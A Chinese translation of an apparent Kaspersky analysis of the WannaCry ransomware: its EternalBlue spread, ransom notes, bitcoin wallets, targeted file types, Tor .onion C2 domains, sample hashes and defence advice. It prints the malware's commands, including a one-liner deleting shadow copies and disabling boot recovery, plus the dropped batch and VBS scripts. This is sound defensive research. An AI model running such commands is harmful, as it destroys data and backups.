5月12日早些時候,卡巴斯基實驗室產品在全球範圍內成功檢測和攔截了大量勒索軟體攻擊。在這些攻擊中,受害者的數據會被加密,並且在被加密文件上添加「.WCRY」的擴展名。
這次攻擊被稱為「WannaCry」攻擊。卡巴斯基實驗室的分析發現,這種攻擊利用微軟Windows系統的一種 SMBv2 遠程代碼執行漏洞進行感染。該漏洞利用程序(代號為「永恆之藍」)於2017年4月14日被Shadowsbrokers黑客組織發布到網際網路上,微軟在3月14日發布了修補該漏洞的補丁。
不幸的是,似乎仍有很多企業和組織未安裝這一安全補丁。
數據來源:https://support.kaspersky.com/shadowbrokers
幾個小時前,西班牙的計算機應急響應團隊CCN-CERT在其網站上發出了警告,聲稱西班牙多家組織遭受大規模勒索軟體攻擊。該警告建議用戶安裝微軟在2017年3月發布的安全公告補丁,以避免攻擊進一步蔓延。
英國國家衛生署(NHS)同樣發布了一條公告,確認英國有16家醫療機構遭受感染。此外,我們還確認有多個國家遭受感染,包括俄羅斯、烏克蘭和印度。
需要了解的是,未安裝補丁的Windows計算機會將SMB服務暴露在外,從而被「永恆之藍」漏洞利用程序遠程攻擊,造成WannaCry勒索軟體感染。但是,不包含這種漏洞的計算機也不能完全避免勒索軟體組件的運行。所以,此次攻擊大範圍爆發的罪魁禍首似乎就是這種漏洞。
對攻擊的分析目前,我們在全球99個國家發現了超過200,000次WannaCry勒索軟體攻擊,其中大多數攻擊位於俄羅斯, 包括美國以及整個歐洲在內的多個國家、國內的高校內網、大型企業內網和政府機構專網中招。需要注意的是,我們所監測到的攻擊數量和受害者範圍可能並不完整,真正的被攻擊目標和受害者可能遠高於這這一數據。
攻擊中使用的惡意軟體會對用戶文件進行加密,同時還會釋放和執行一個解密工具。之後,會顯示一個窗口,要求受害者支付價值600美元的比特幣到攻擊者的比特幣錢包。有趣的是,儘管攻擊者索要的贖金金額為600美元,但向該錢包支付的前五筆贖金為300美元的比特幣。這表明,該攻擊組織提高了索要的贖金金額。
這種勒索工具具有多種語言版本,目的是對多個國家的受害者進行勒索。
值得注意的是,該惡意軟體還會給出一個倒計時,聲稱超過這個時間後贖金金額會增加,同時顯示另一個窗口,催促受害者儘快支付贖金,威脅受害者如果不在倒計時期間支付贖金,所有的數據和文件會全部丟失。並非所有的勒索軟體都會提供這種倒計時。
為了確保用戶看到這些警告信息,惡意軟體會替換用戶的計算機桌面壁紙,內容為如何找到惡意軟體釋放的解密工具。
惡意軟體樣本不包含任何有關特定文化或代碼頁的內容,只有通用的英語和拉丁語代碼頁CP1252。文件包含版本信息,但這些信息盜用了隨機的微軟Windows 7 系統工具。
為了便於受害者支付比特幣,惡意軟體包含一個來自btcfrog的二維碼頁面,該連接指向的比特幣錢包地址為13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94。這些圖像的元數據中也無法提供任何額外信息:
攻擊者使用的比特幣錢包地址之一為:
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
其中一個錢包在過去幾小時內收到了0.88比特幣
在惡意軟體樣本的「readme.txt」文件中還包含攻擊者使用的另一個比特幣錢包地址:115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn– 0.32 比特幣
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw – 0.16 比特幣
1QAc9S5EmycqjzzWDc1yiWzr9jJLC8sLiY
為了執行命令和控制惡意軟體行為,惡意軟體使用了Tor服務的可執行文件,並且釋放了必要的依賴文件用於訪問Tor網絡:
用於訪問Tor服務所釋放的文件
在攻擊目標方面,這種勒索軟體會加密以下擴展名的文件:
.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc
惡意軟體攻擊的文件類型包括:
常用的Office文件(擴展名為.ppt、.doc、.docx、.xlsx、.sxi)
並不常用,但是某些特定國家使用的office文件格式(.sxw、.odt、.hwp)
壓縮文檔和媒體文件(.zip、.rar、.tar、.mp4、.mkv)
電子郵件和郵件資料庫(.eml、.msg、.ost、.pst、.deb)
資料庫文件(.sql、.accdb、.mdb、.dbf、.odb、.myd)
開發者使用的原始碼和項目文件(.php、.java、.cpp、.pas、.asm)
密匙和證書(.key、.pfx、.pem、.p12、.csr、.gpg、.aes)
美術設計人員、藝術家和攝影師使用的文件(.vsd、.odg、.raw、.nef、.svg、.psd)
虛擬機文件(.vmx、.vmdk、.vdi)
WannaCry dropper病毒會釋放多種語言版本的交付贖金解密說明,包括:
保加利亞語、中文(簡體)、中文(繁體)、克羅埃西亞語、捷克語、丹麥語、荷蘭語、英語、法語、德語、芬蘭語、菲律賓語、印尼語、希臘語、日語、韓語、義大利語、拉脫維亞語、挪威語、波蘭語、葡萄牙語、羅馬尼亞語、俄語、斯洛伐克語、西班牙語、瑞典語、土耳其語、越南語
例如,以下是一個英語版本的交付贖金解密說明:
我的電腦出了什麼問題?
你的重要文件已被加密。
電腦中的文檔、照片、視頻、資料庫和其他文件已被加密,無法進行訪問。也許你正在尋找恢復文件的方法,但是請不要浪費時間。除了我們的解密服務,沒有人可以恢復你的文件。
我的文件可以恢復嗎?
當然,我們保證你可以安全無憂地恢復所有文件。但是你沒有足夠的時間。
你可以免費解密一些文件。請點擊試用。
如果想要解密所有文件,請支付贖金。
你只有3天贖金支付期限。之後價格將會翻倍。
此外,7天內未付款者將永遠無法恢復文件。
對於不能在6個月內支付贖金的貧困用戶,我們將推出免費活動。
怎麼進行付款?
我們只接受比特幣付款。請單擊此處,了解更多詳情。
請查看比特幣的當前價格,購買一些比特幣。請單擊此處,了解更多詳情。
並且,請將正確的金額發送至此窗口中指定的地址。
付款後,請點擊此處。最佳收款核對時間:格林尼治時間星期一至星期五上午9:00 - 11:00。
確認收到贖金後,你可以立即解密文件。
聯繫方式
如需我們的幫助,請點擊此處發送信息。
我們強烈建議你不要刪除該軟體,並在一段時間內禁用反病毒軟體,直至你支付贖金並得到處理。如反病毒軟體自動更新並刪除該軟體,即使你支付了贖金也無法恢復文件!
它還釋放了批處理文件、VBS腳本文件和一個readme文件(內容詳見附錄)。
為了避免用戶關閉紅色對話框或不理解裡面的內容,攻擊者將文本文件釋放到刪除到磁碟上,進行進一步指示。舉一個例子,他們將名為@ please_read_me. txt的「readme」文件釋放到受害主機磁碟的許多目錄中。請注意,除了「我怎麼能相信你?」這一句話外,readme文件的英語表達非常好。到目前為止,受害者已和這一115p7ummngoj1pmvkphijcrdfjnxj6lrln比特幣帳戶進行了兩次交易,金額約300美元:
問:我的文件怎麼了?
答:你的重要文件被加密了。這意味著,除非解密這些文件,否則你將無法正常打開。
如果按照我們的指示去做,我們保證你可以快速安全地解密所有文件!
讓我們開始解密!
問:我該怎麼辦?
答:首先,你需要支付服務費進行解密。請向115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn比特幣帳戶支付價值300美金的比特幣。
接著,找到名為@WanaDecryptor@.exe的應用文件。這就是解密軟體。
請運行指示並按照指示內容去做。(你可能需要在一段時間內禁用反病毒軟體。)
問:我怎麼能相信你?
答:請不要擔心解密問題。
我們肯定會解密恢復你的文件,因為一旦欺騙用戶,沒有人會信任我們。
* 如需幫助,請點擊解密器窗口發送信息。
一旦開始解密,將立即生成幾個進程,更改文件權限,與隱藏的c2伺服器進行通信:
· attrib +h .
· icacls . /grant Everyone:F /T /C /Q
· C:\Users\xxx\AppData\Local\Temp\taskdl.exe
· @WanaDecryptor@.exe fi
· 300921484251324.bat
· C:\Users\xxx\AppData\Local\Temp\taskdl.exe
· C:\Users\xxx\AppData\Local\Temp\taskdl.exe
惡意軟體創建互斥鎖「Global\MsWinZonesCacheCounterMutexA」並運行這一指令:
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
用戶將看到一個彈出的用戶帳戶控制彈窗。
禁用卷影射服務(系統還原)的用戶帳戶控制彈窗
該惡意軟體使用了TOR隱藏的指令和控制服務。以下為.onion域的列表:
· gx7ekbenv2riucmf.onion
· 57g7spgrzlojinas.onion
· Xxlvbrloxvriy2c5.onion
· 76jdd2ir2embyv47.onion
· cwwnhwhlz52maqm7.onion
· sqjolphimrr7jqw6.onion
防禦和檢測信息
卡巴斯基系統監視組件在阻止這些攻擊中起到相當重要的作用。系統監視組件可以在惡意樣本設法繞過其他防禦技術的情況下,回滾勒索軟體做出的更改。系統監視組件的這一功能極其有用,尤其在惡意樣本繞過防禦技術並試圖加密磁碟數據的情況下。
系統監視組件攔截WannaCry攻擊
防禦建議:
1、確保所有主機運行並啟用端點安全解決方案。
2、安裝微軟官方提供的補丁,可關閉受影響的伺服器漏洞。
3、確保卡巴斯基實驗室產品中的系統監視組件處於啟用狀態。
4、掃描所有系統。在檢測到名為MEM:Trojan.Win64.EquationDrug.gen的 惡意軟體攻擊後,請重啟系統,並確保安裝了MS17-010補丁。
目前在攻擊中檢測到的樣本包括:
4fef5e34143e646dbf9907c4374276f5
5bef35496fcbdbe841c82f4d1ab8b7c2
775a0631fb8229b2aa3d7621427085ad
7bf2b57f2a205768755c07f238fb32cc
7f7ccaa16fb15eb1c7399d422f8363e8
8495400f199ac77853c53b5a3f278f3e
84c82835a5d21bbcf75a61706d8ab549
86721e64ffbd69aa6944b9672bcabb6d
8dd63adb68ef053e044a5a2f46e0d2cd
b0ad5902366f860f85b892867e5b1e87
d6114ba5f10ad67a4131ab72531f02da
db349b97c37d22f5ea1d1841e3c89eb4
e372d07207b4da75b3434584cd9f3450
f529f4556a5126bba499c26d67892240
卡巴斯基實驗室檢測出的樣本名稱包括:
Trojan-Ransom.Win32.Gen.djd
Trojan-Ransom.Win32.Scatter.tr
Trojan-Ransom.Win32.Wanna.b
Trojan-Ransom.Win32.Wanna.c
Trojan-Ransom.Win32.Wanna.d
Trojan-Ransom.Win32.Wanna.f
Trojan-Ransom.Win32.Zapchast.i
PDM:Trojan.Win32.Generic
卡巴斯基實驗室的專家目前正在加緊研發解密工具,幫助受害者恢復被加密的文件。
附件
批處理文件
@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0
m.vbs
SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\Users\ADMINI~1\AppData\Local\Temp\@WanaDecryptor@.exe"
om.Save